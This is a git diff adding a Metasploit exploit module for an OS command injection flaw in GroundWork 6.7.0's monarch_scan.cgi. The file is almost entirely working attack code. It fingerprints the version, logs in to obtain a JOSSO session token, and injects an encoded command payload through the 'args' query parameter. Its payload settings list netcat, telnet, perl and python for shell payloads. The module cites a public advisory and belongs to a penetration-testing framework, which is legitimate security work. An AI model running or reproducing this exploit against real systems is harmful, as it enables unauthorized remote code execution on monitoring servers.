diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb new file mode 100644 index 0000000000..dfa6bf45da --- /dev/null +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb @@ -0,0 +1,129 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "GroundWork monarch_scan.cgi OS Command Injection", + 'Description' => %q{ + This module exploits a vulnerability found in GroundWork 6.7.0. This software + is used for network, application and cloud monitoring. The vulnerability exists in + the monarch_scan.cgi, where user controlled input is used in the perl qx function, + which allows any remote authenticated attacker, whatever his privileges are, to + inject system commands and gain arbitrary code execution. The module has been tested + successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04 + based VM appliance. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Johannes Greil', # Vulnerability Discovery, PoC + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'OSVDB', '91051' ], + [ 'US-CERT-VU', '345260' ], + [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ] + ], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Space' => 8190, + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd' + }, + # Based on the default Ubuntu 10.04 VM appliance + 'RequiredCmd' => 'generic telnet netcat perl python' + }, + 'Platform' => ['unix', 'linux'], + 'Targets' => + [ + ['GroundWork 6.7.0', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Mar 8 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('USERNAME', [true, 'GroundWork Username', 'user']), + OptString.new('PASSWORD', [true, 'GroundWork Password', 'user']) + ], self.class) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("josso", "signon", "login.do") + }) + + if res and res.body =~ /GroundWork.*6\.7\.0/ + return Exploit::CheckCode::Appears + elsif res and res.body =~ /GroundWork/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def get_josso_token + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri("josso", "signon", "usernamePasswordLogin.do"), + 'vars_post' => { + 'josso_cmd' => 'login', + 'josso_username' => datastore['USERNAME'], + 'josso_password' => datastore['PASSWORD'] + } + }) + if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/ + return $1 + else + return nil + end + end + + def execute_command(command) + http_handler = ((datastore['SSL']) ? "https" : "http") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("monarch", "monarch_scan.cgi"), + 'headers' => + { + 'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc" + }, + 'cookie' => "JOSSO_SESSIONID=#{@josso_id}", + 'query' => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}" + }) + return res + end + + def exploit + peer = "#{rhost}:#{rport}" + + print_status("#{peer} - Attempting to login...") + @josso_id = get_josso_token + if @josso_id.nil? + fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID") + end + print_good("#{peer} - Authentication successful") + + print_status("#{peer} - Sending malicious request...") + execute_command(payload.encoded) + end +end